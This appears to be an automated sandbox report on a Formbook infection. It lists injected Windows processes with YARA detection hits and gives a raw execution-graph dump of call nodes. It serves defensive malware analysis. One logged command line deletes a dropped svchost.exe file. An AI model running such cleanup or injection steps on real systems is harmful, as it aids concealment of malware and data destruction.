                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:02:06:01
                                                                                                                    Start date:06/11/2024
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000008.00000002.3714914384.000000000945C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:11
                                                                                                                    Start time:02:06:16
                                                                                                                    Start date:06/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                                    Imagebase:0xc40000
                                                                                                                    File size:86'528 bytes
                                                                                                                    MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:12
                                                                                                                    Start time:02:06:17
                                                                                                                    Start date:06/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                    Imagebase:0x410000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:02:06:17
                                                                                                                    Start date:06/11/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                      Signature Coverage:6.8%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:36
                                                                                                                      execution_graph 86079 4010e0 86082 401100 86079->86082 86081 4010f8 86083 401113 86082->86083 86085 401184 86083->86085 86086 40114c 86083->86086 86088 401120 86083->86088 86113 401182 86083->86113 86084 40112c DefWindowProcW 86084->86081 86120 401250 86085->86120 86089 401151 86086->86089 86090 40119d 86086->86090 86088->86084 86141 401000 Shell_NotifyIconW __recalloc 86088->86141 86094 401219 86089->86094 86095 40115d 86089->86095 86092 4011a3 86090->86092 86093 42afb4 86090->86093 86091 401193 86091->86081 86092->86088 86104 4011b6 KillTimer 86092->86104 86105 4011db SetTimer RegisterWindowMessageW 86092->86105 86136 40f190 10 API calls 86093->86136 86094->86088 86096 401225 86094->86096 86099 401163 86095->86099 86100 42b01d 86095->86100 86143 468b0e 74 API calls __recalloc 86096->86143 86101 42afe9 86099->86101 86102 40116c 86099->86102 86100->86084 86140 4370f4 52 API calls 86100->86140 86138 40f190 10 API calls 86101->86138 86102->86088 86106 401174 86102->86106 86103 42b04f 86142 40e0c0 74 API calls __recalloc 86103->86142 86135 401000 Shell_NotifyIconW __recalloc 86104->86135 86105->86091 86111 401204 CreatePopupMenu 86105->86111 86137 45fd57 65 API calls __recalloc 86106->86137 86111->86081 86113->86084 86114 42afe4 86114->86091 86115 42b00e 86139 401a50 338 API calls 86115->86139 86116 4011c9 PostQuitMessage 86116->86081 86119 42afdc 86119->86084 86119->86114 86121 4012e8 86120->86121 86122 401262 __recalloc 86120->86122 86121->86091 86144 401b80 86122->86144 86124 40128c 86125 4012d1 KillTimer SetTimer 86124->86125 86126 4012bb 86124->86126 86127 4272ec 86124->86127 86125->86121 86130 4012c5 86126->86130 86131 42733f 86126->86131 86128 4272f4 Shell_NotifyIconW 86127->86128 86129 42731a Shell_NotifyIconW 86127->86129 86128->86125 86129->86125 86130->86125 86134 427393 Shell_NotifyIconW 86130->86134 86132 427348 Shell_NotifyIconW 86131->86132 86133 42736e Shell_NotifyIconW 86131->86133 86132->86125 86133->86125 86134->86125 86135->86116 86136->86091 86137->86119 86138->86115 86139->86113 86140->86113 86141->86103 86142->86113 86143->86114 86145 401b9c 86144->86145 86165 401c7e 86144->86165 86166 4013c0 52 API calls 86145->86166 86147 401bac 86148 42722b LoadStringW 86147->86148 86149 401bb9 86147->86149 86151 427246 86148->86151 86167 402160 86149->86167 86181 40e0a0 86151->86181 86152 401bcd 86154 427258 86152->86154 86155 401bda 86152->86155 86185 40d200 52 API calls 2 library calls 86154->86185 86155->86151 86156 401be4 86155->86156 86180 40d200 52 API calls 2 library calls 86156->86180 86159 427267 86160 401bf3 _wcscpy __recalloc _wcsncpy 86159->86160 86161 42727b 86159->86161 86164 401c62 Shell_NotifyIconW 86160->86164 86186 40d200 52 API calls 2 library calls 86161->86186 86163 427289 86164->86165 86165->86124 86166->86147 86168 426daa 86167->86168 86170 40216b _wcslen 86167->86170 86200 40c600 86168->86200 86172 402180 86170->86172 86173 40219e 86170->86173 86171 426db5 86171->86152 86187 403bd0 52 API calls moneypunct 86172->86187 86188 4013a0 52 API calls 86173->86188 86176 402187 _memmove 86176->86152 86177 4021a5 86178 426db7 86177->86178 86189 4115d7 86177->86189 86180->86160 86182 40e0b2 86181->86182 86183 40e0a8 86181->86183 86182->86160 86236 403c30 52 API calls _memmove 86183->86236 86185->86159 86186->86163 86187->86176 86188->86177 86191 4115e1 _malloc 86189->86191 86192 4115fb 86191->86192 86195 4115fd std::exception::exception 86191->86195 86205 4135bb 86191->86205 86192->86176 86193 41163b 86220 4180af 46 API calls std::exception::operator= 86193->86220 86195->86193 86219 41130a 51 API calls __cinit 86195->86219 86196 411645 86221 418105 RaiseException 86196->86221 86199 411656 86201 40c619 86200->86201 86202 40c60a 86200->86202 86201->86171 86202->86201 86228 4026f0 86202->86228 86204 426d7a _memmove 86204->86171 86206 413638 _malloc 86205->86206 86216 4135c9 _malloc 86205->86216 86227 417f77 46 API calls __getptd_noexit 86206->86227 86207 4135d4 86207->86216 86222 418901 46 API calls __NMSG_WRITE 86207->86222 86223 418752 46 API calls 6 library calls 86207->86223 86224 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86207->86224 86210 4135f7 RtlAllocateHeap 86211 413630 86210->86211 86210->86216 86211->86191 86213 413624 86225 417f77 46 API calls __getptd_noexit 86213->86225 86216->86207 86216->86210 86216->86213 86217 413622 86216->86217 86226 417f77 46 API calls __getptd_noexit 86217->86226 86219->86193 86220->86196 86221->86199 86222->86207 86223->86207 86225->86217 86226->86211 86227->86211 86229 426873 86228->86229 86230 4026ff 86228->86230 86235 4013a0 52 API calls 86229->86235 86230->86204 86232 42687b 86233 4115d7 52 API calls 86232->86233 86234 42689e _memmove 86233->86234 86234->86204 86235->86232 86236->86182 86237 40bd20 86238 428194 86237->86238 86241 40bd2d 86237->86241 86239 40bd43 86238->86239 86240 4281bc 86238->86240 86243 4281b2 86238->86243 86259 45e987 86 API calls moneypunct 86240->86259 86247 40bd37 86241->86247 86260 4531b1 85 API calls 5 library calls 86241->86260 86258 40b510 VariantClear 86243->86258 86249 40bd50 86247->86249 86248 4281ba 86250 426cf1 86249->86250 86251 40bd63 86249->86251 86270 44cde9 52 API calls _memmove 86250->86270 86261 40bd80 86251->86261 86254 40bd73 86254->86239 86255 426cfc 86256 40e0a0 52 API calls 86255->86256 86257 426d02 86256->86257 86258->86248 86259->86241 86260->86247 86262 40bd8e 86261->86262 86269 40bdb7 _memmove 86261->86269 86263 40bded 86262->86263 86264 40bdad 86262->86264 86262->86269 86266 4115d7 52 API calls 86263->86266 86271 402f00 86264->86271 86267 40bdf6 86266->86267 86268 4115d7 52 API calls 86267->86268 86267->86269 86268->86269 86269->86254 86270->86255 86272 402f10 86271->86272 86273 402f0c 86271->86273 86274 4115d7 52 API calls 86272->86274 86275 4268c3 86272->86275 86273->86269 86276 402f51 moneypunct _memmove 86274->86276 86276->86269 86277 425ba2 86282 40e360 86277->86282 86279 425bb4 86298 41130a 51 API calls __cinit 86279->86298 86281 425bbe 86283 4115d7 52 API calls 86282->86283 86284 40e3ec GetModuleFileNameW 86283->86284 86299 413a0e 86284->86299 86286 40e421 _wcsncat 86302 413a9e 86286->86302 86289 4115d7 52 API calls 86290 40e45e _wcscpy 86289->86290 86305 40bc70 86290->86305 86294 40e4a9 86294->86279 86295 401c90 52 API calls 86297 40e4a1 _wcscat _wcslen _wcsncpy 86295->86297 86296 4115d7 52 API calls 86296->86297 86297->86294 86297->86295 86297->86296 86298->86281 86324 413801 86299->86324 86354 419efd 86302->86354 86306 4115d7 52 API calls 86305->86306 86307 40bc98 86306->86307 86308 4115d7 52 API calls 86307->86308 86309 40bca6 86308->86309 86310 40e4c0 86309->86310 86366 403350 86310->86366 86312 40e4cb RegOpenKeyExW 86313 427190 RegQueryValueExW 86312->86313 86314 40e4eb 86312->86314 86315 4271b0 86313->86315 86316 42721a RegCloseKey 86313->86316 86314->86297 86317 4115d7 52 API calls 86315->86317 86316->86297 86318 4271cb 86317->86318 86373 43652f 52 API calls 86318->86373 86320 4271d8 RegQueryValueExW 86321 42720e 86320->86321 86322 4271f7 86320->86322 86321->86316 86323 402160 52 API calls 86322->86323 86323->86321 86325 41389e 86324->86325 86331 41381a 86324->86331 86326 4139e8 86325->86326 86328 413a00 86325->86328 86351 417f77 46 API calls __getptd_noexit 86326->86351 86353 417f77 46 API calls __getptd_noexit 86328->86353 86329 4139ed 86352 417f25 10 API calls _raise 86329->86352 86331->86325 86338 41388a 86331->86338 86346 419e30 46 API calls _raise 86331->86346 86334 41396c 86334->86325 86336 413967 86334->86336 86339 41397a 86334->86339 86335 413929 86335->86325 86337 413945 86335->86337 86348 419e30 46 API calls _raise 86335->86348 86336->86286 86337->86325 86337->86336 86342 41395b 86337->86342 86338->86325 86345 413909 86338->86345 86347 419e30 46 API calls _raise 86338->86347 86350 419e30 46 API calls _raise 86339->86350 86349 419e30 46 API calls _raise 86342->86349 86345->86334 86345->86335 86346->86338 86347->86345 86348->86337 86349->86336 86350->86336 86351->86329 86352->86336 86353->86336 86355 419f13 86354->86355 86356 419f0e 86354->86356 86363 417f77 46 API calls __getptd_noexit 86355->86363 86356->86355 86357 419f2b 86356->86357 86361 40e454 86357->86361 86365 417f77 46 API calls __getptd_noexit 86357->86365 86361->86289 86362 419f18 86364 417f25 10 API calls _raise 86362->86364 86363->86362 86364->86361 86365->86362 86367 403367 86366->86367 86368 403358 86366->86368 86369 4115d7 52 API calls 86367->86369 86368->86312 86370 403370 86369->86370 86371 4115d7 52 API calls 86370->86371 86372 40339e 86371->86372 86372->86312 86373->86320 86374 40b374 86375 40b328 86374->86375 86378 40f430 86375->86378 86377 40b333 86379 40f444 86378->86379 86385 40cc70 86379->86385 86381 40f462 86382 40f46b 86381->86382 86394 40c790 VariantClear moneypunct 86381->86394 86382->86377 86384 40f487 86384->86377 86395 40a780 86385->86395 86387 40cc96 86388 42bd0e 86387->86388 86389 40cc9e 86387->86389 86390 408f40 VariantClear 86388->86390 86436 408f40 86389->86436 86391 42bd16 86390->86391 86391->86381 86393 40ccb8 86393->86381 86394->86384 86396 40a7a6 86395->86396 86397 40ae8c 86395->86397 86399 4115d7 52 API calls 86396->86399 86454 41130a 51 API calls __cinit 86397->86454 86409 40a7c6 moneypunct _memmove 86399->86409 86400 40a86d 86401 40a878 moneypunct 86400->86401 86402 40abd1 86400->86402 86411 408f40 VariantClear 86401->86411 86414 40a884 moneypunct 86401->86414 86465 45e737 90 API calls 3 library calls 86402->86465 86405 40bc10 53 API calls 86405->86409 86406 40b5f0 89 API calls 86406->86409 86407 408e80 VariantClear 86407->86409 86408 42b791 VariantClear 86408->86409 86409->86400 86409->86402 86409->86405 86409->86406 86409->86407 86409->86408 86410 42ba2d VariantClear 86409->86410 86412 4115d7 52 API calls 86409->86412 86413 42b459 VariantClear 86409->86413 86415 40e270 VariantClear 86409->86415 86416 42b6f6 VariantClear 86409->86416 86420 42bbf5 86409->86420 86421 4115d7 52 API calls 86409->86421 86423 408f40 VariantClear 86409->86423 86426 42bb6a 86409->86426 86430 42bc37 86409->86430 86435 4530c9 VariantClear 86409->86435 86440 408cc0 86409->86440 86455 401b10 86409->86455 86461 45308a 53 API calls 86409->86461 86462 470870 52 API calls 86409->86462 86463 457f66 87 API calls __write_nolock 86409->86463 86464 472f47 127 API calls 86409->86464 86410->86409 86411->86401 86412->86409 86413->86409 86414->86387 86415->86409 86416->86409 86419 42bc5b 86419->86387 86466 45e737 90 API calls 3 library calls 86420->86466 86424 42b5b3 VariantInit VariantCopy 86421->86424 86423->86409 86424->86409 86428 42b5d7 VariantClear 86424->86428 86468 44b92d VariantClear 86426->86468 86428->86409 86467 45e737 90 API calls 3 library calls 86430->86467 86433 42bc48 86433->86426 86434 408f40 VariantClear 86433->86434 86434->86426 86435->86409 86437 408f48 moneypunct 86436->86437 86438 4265c7 VariantClear 86437->86438 86439 408f55 moneypunct 86437->86439 86438->86439 86439->86393 86469 408d90 86440->86469 86442 429778 86497 410c60 VariantClear moneypunct 86442->86497 86444 408cf9 86444->86442 86446 42976c 86444->86446 86448 408d2d 86444->86448 86445 429780 86496 45e737 90 API calls 3 library calls 86446->86496 86485 403d10 86448->86485 86451 408d71 moneypunct 86451->86409 86452 408f40 VariantClear 86453 408d45 moneypunct 86452->86453 86453->86451 86453->86452 86454->86409 86456 401b16 _wcslen 86455->86456 86457 4115d7 52 API calls 86456->86457 86458 401b63 86456->86458 86459 401b4b _memmove 86457->86459 86458->86409 86460 4115d7 52 API calls 86459->86460 86460->86458 86461->86409 86462->86409 86463->86409 86464->86409 86465->86426 86466->86426 86467->86433 86468->86419 86470 4289d2 86469->86470 86471 408db3 86469->86471 86500 45e737 90 API calls 3 library calls 86470->86500 86498 40bec0 90 API calls 86471->86498 86474 4289e5 86501 45e737 90 API calls 3 library calls 86474->86501 86475 408e5a 86475->86444 86478 428a05 86479 408f40 VariantClear 86478->86479 86479->86475 86480 40a780 201 API calls 86481 408dc9 86480->86481 86481->86474 86481->86475 86481->86478 86481->86480 86482 408e64 86481->86482 86484 408f40 VariantClear 86481->86484 86499 40ba10 52 API calls 2 library calls 86481->86499 86483 408f40 VariantClear 86482->86483 86483->86475 86484->86481 86486 408f40 VariantClear 86485->86486 86487 403d20 86486->86487 86502 403cd0 86487->86502 86489 403d4d 86506 46e91c 86489->86506 86509 4813fa 86489->86509 86519 45e17d 86489->86519 86529 467897 86489->86529 86573 4755ad 86489->86573 86490 403d76 86490->86442 86490->86453 86496->86442 86497->86445 86498->86481 86499->86481 86500->86474 86501->86478 86503 403cdf 86502->86503 86504 408f40 VariantClear 86503->86504 86505 403ce7 86504->86505 86505->86489 86576 46e785 86506->86576 86508 46e92f 86508->86490 86681 45340c 86509->86681 86511 481438 86687 402880 86511->86687 86513 48143f 86514 40a780 201 API calls 86513->86514 86516 481465 86513->86516 86514->86516 86518 481469 86516->86518 86729 40e710 53 API calls 86516->86729 86517 4814a4 86517->86490 86518->86490 86520 45e198 86519->86520 86521 45e19c 86520->86521 86522 45e1b8 86520->86522 86523 408f40 VariantClear 86521->86523 86524 45e1cc 86522->86524 86525 45e1db FindClose 86522->86525 86526 45e1a4 86523->86526 86527 45e1d9 moneypunct 86524->86527 86528 44ae3e CloseHandle 86524->86528 86525->86527 86526->86490 86527->86490 86528->86527 86530 4678bb 86529->86530 86533 45340c 85 API calls 86530->86533 86562 467954 86530->86562 86531 4115d7 52 API calls 86532 467989 86531->86532 86534 467995 86532->86534 86748 40da60 53 API calls 86532->86748 86535 4678f6 86533->86535 86538 4533eb 85 API calls 86534->86538 86537 413a0e __wsplitpath 46 API calls 86535->86537 86539 4678fc 86537->86539 86540 4679b7 86538->86540 86541 401b10 52 API calls 86539->86541 86542 40de40 60 API calls 86540->86542 86543 46790c 86541->86543 86545 4679c3 86542->86545 86745 40d200 52 API calls 2 library calls 86543->86745 86546 4679c7 GetLastError 86545->86546 86547 467a05 86545->86547 86549 403cd0 VariantClear 86546->86549 86552 467a2c 86547->86552 86553 467a4b 86547->86553 86548 467917 86548->86562 86746 4339fa GetFileAttributesW FindFirstFileW FindClose 86548->86746 86550 4679dc 86549->86550 86554 4679e6 86550->86554 86558 44ae3e CloseHandle 86550->86558 86557 4115d7 52 API calls 86552->86557 86555 4115d7 52 API calls 86553->86555 86561 408f40 VariantClear 86554->86561 86559 467a49 86555->86559 86556 467928 86560 46792f 86556->86560 86556->86562 86564 467a31 86557->86564 86558->86554 86568 408f40 VariantClear 86559->86568 86747 4335cd 56 API calls 3 library calls 86560->86747 86567 4679ed 86561->86567 86562->86531 86563 467964 86562->86563 86563->86490 86749 436299 52 API calls 2 library calls 86564->86749 86567->86490 86570 467a88 86568->86570 86569 467939 86569->86562 86571 408f40 VariantClear 86569->86571 86570->86490 86572 467947 86571->86572 86572->86562 86750 475077 86573->86750 86575 4755c0 86575->86490 86577 46e7a2 86576->86577 86578 4115d7 52 API calls 86577->86578 86581 46e802 86577->86581 86579 46e7ad 86578->86579 86580 46e7b9 86579->86580 86624 40da60 53 API calls 86579->86624 86625 4533eb 86580->86625 86582 46e7e5 86581->86582 86589 46e82f 86581->86589 86584 408f40 VariantClear 86582->86584 86586 46e7ea 86584->86586 86586->86508 86588 46e8b5 86617 4680ed 86588->86617 86589->86588 86592 46e845 86589->86592 86595 4533eb 85 API calls 86592->86595 86594 46e8bb 86621 443fbe 86594->86621 86604 46e84b 86595->86604 86596 46e7db 86596->86582 86641 44ae3e 86596->86641 86597 46e87a 86644 4689f4 59 API calls 86597->86644 86601 46e883 86645 4013c0 52 API calls 86601->86645 86604->86597 86604->86601 86605 46e88f 86607 40e0a0 52 API calls 86605->86607 86606 408f40 VariantClear 86615 46e881 86606->86615 86608 46e899 86607->86608 86646 40d200 52 API calls 2 library calls 86608->86646 86610 46e911 86610->86508 86611 46e8a5 86647 4689f4 59 API calls 86611->86647 86614 46e903 86616 44ae3e CloseHandle 86614->86616 86615->86610 86648 40da20 86615->86648 86616->86610 86618 468100 86617->86618 86619 4680fa 86617->86619 86618->86594 86652 467ac4 55 API calls 2 library calls 86619->86652 86653 443e36 86621->86653 86623 443fd3 86623->86606 86623->86615 86624->86580 86626 453404 86625->86626 86627 4533f8 86625->86627 86629 40de40 86626->86629 86627->86626 86660 4531b1 85 API calls 5 library calls 86627->86660 86630 40da20 CloseHandle 86629->86630 86631 40de4e 86630->86631 86661 40f110 86631->86661 86634 4264fa 86636 40de84 86670 40e080 SetFilePointerEx SetFilePointerEx 86636->86670 86638 40de8b 86671 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86638->86671 86640 40de90 86640->86589 86640->86596 86642 44ae4b moneypunct 86641->86642 86673 443fdf 86641->86673 86642->86582 86644->86615 86645->86605 86646->86611 86647->86615 86649 40da37 86648->86649 86650 40da29 86648->86650 86649->86650 86651 40da3c CloseHandle 86649->86651 86650->86614 86651->86614 86652->86618 86656 443e19 86653->86656 86657 443e26 86656->86657 86658 443e32 WriteFile 86656->86658 86659 443db4 SetFilePointerEx SetFilePointerEx 86657->86659 86658->86623 86659->86658 86660->86626 86662 40f125 CreateFileW 86661->86662 86663 42630c 86661->86663 86664 40de74 86662->86664 86663->86664 86665 426311 CreateFileW 86663->86665 86664->86634 86669 40dea0 55 API calls moneypunct 86664->86669 86665->86664 86666 426337 86665->86666 86672 40df90 SetFilePointerEx SetFilePointerEx 86666->86672 86668 426342 86668->86664 86669->86636 86670->86638 86671->86640 86672->86668 86674 40da20 CloseHandle 86673->86674 86675 443feb 86674->86675 86678 4340db 86675->86678 86677 444001 86677->86642 86679 40da20 CloseHandle 86678->86679 86680 4340e7 moneypunct 86679->86680 86680->86677 86682 453439 86681->86682 86683 453419 86681->86683 86682->86511 86684 45342f 86683->86684 86730 4531b1 85 API calls 5 library calls 86683->86730 86684->86511 86686 453425 86686->86511 86688 4115d7 52 API calls 86687->86688 86689 4028b3 86688->86689 86690 4115d7 52 API calls 86689->86690 86717 4028c5 moneypunct _memmove 86690->86717 86692 402b1e moneypunct 86692->86513 86693 427d62 86697 403350 52 API calls 86693->86697 86695 402bb6 86733 403060 53 API calls 86695->86733 86696 402aeb moneypunct 86700 42802b moneypunct 86696->86700 86732 402780 52 API calls 2 library calls 86696->86732 86706 427d6b 86697->86706 86699 402bca 86701 427f63 86699->86701 86702 402bd4 86699->86702 86740 460879 92 API calls 3 library calls 86701->86740 86734 402780 52 API calls 2 library calls 86702->86734 86703 403350 52 API calls 86703->86717 86728 427f2c 86706->86728 86737 403020 52 API calls _memmove 86706->86737 86708 402bdf 86708->86513 86710 427fd5 86742 460879 92 API calls 3 library calls 86710->86742 86711 402780 52 API calls 86711->86717 86714 427fe4 86743 402780 52 API calls 2 library calls 86714->86743 86715 427fa5 86741 402780 52 API calls 2 library calls 86715->86741 86716 402f00 52 API calls 86716->86717 86717->86693 86717->86695 86717->86696 86717->86703 86717->86710 86717->86711 86717->86715 86717->86716 86719 428000 86717->86719 86721 4026f0 52 API calls 86717->86721 86727 4115d7 52 API calls 86717->86727 86717->86728 86731 4031b0 63 API calls 86717->86731 86735 402f80 92 API calls _memmove 86717->86735 86736 402280 52 API calls 86717->86736 86738 4013a0 52 API calls 86717->86738 86744 460879 92 API calls 3 library calls 86719->86744 86722 402a85 CharUpperBuffW 86721->86722 86722->86717 86726 427f48 86726->86692 86727->86717 86739 460879 92 API calls 3 library calls 86728->86739 86729->86517 86730->86686 86731->86717 86732->86692 86733->86699 86734->86708 86735->86717 86736->86717 86737->86706 86738->86717 86739->86726 86740->86726 86741->86692 86742->86714 86743->86726 86744->86692 86745->86548 86746->86556 86747->86569 86748->86534 86749->86559 86751 4533eb 85 API calls 86750->86751 86752 4750b8 86751->86752 86753 4750ee 86752->86753 86754 475129 86752->86754 86755 408f40 VariantClear 86753->86755 86803 4646e0 86754->86803 86761 4750f5 86755->86761 86757 47515e 86758 475162 86757->86758 86790 47518e 86757->86790 86759 408f40 VariantClear 86758->86759 86791 475169 86759->86791 86760 475357 86762 475365 86760->86762 86763 4754ea 86760->86763 86761->86575 86837 44b3ac 57 API calls 86762->86837 86847 464812 92 API calls 86763->86847 86767 4754fc 86768 475374 86767->86768 86770 475508 86767->86770 86816 430d31 86768->86816 86769 4533eb 85 API calls 86769->86790 86772 408f40 VariantClear 86770->86772 86775 47550f 86772->86775 86773 475388 86823 4577e9 86773->86823 86775->86791 86777 47539e 86831 410cfc 86777->86831 86778 475480 86780 408f40 VariantClear 86778->86780 86780->86791 86782 4753d4 86839 40e830 53 API calls 86782->86839 86783 4753b8 86838 45e737 90 API calls 3 library calls 86783->86838 86786 4753c5 GetCurrentProcess TerminateProcess 86786->86782 86787 4753e3 86801 475406 86787->86801 86840 40cf00 53 API calls 86787->86840 86788 4754b5 86789 408f40 VariantClear 86788->86789 86789->86791 86790->86760 86790->86769 86790->86778 86790->86788 86835 436299 52 API calls 2 library calls 86790->86835 86836 463ad5 64 API calls __wcsicoll 86790->86836 86791->86575 86793 4753f8 86841 46c43e 106 API calls 2 library calls 86793->86841 86796 475556 86796->86791 86797 47556e FreeLibrary 86796->86797 86797->86791 86801->86796 86802 408f40 VariantClear 86801->86802 86842 40cf00 53 API calls 86801->86842 86843 408e80 86801->86843 86848 44b3ac 57 API calls 86801->86848 86849 46c43e 106 API calls 2 library calls 86801->86849 86802->86801 86850 4536f7 53 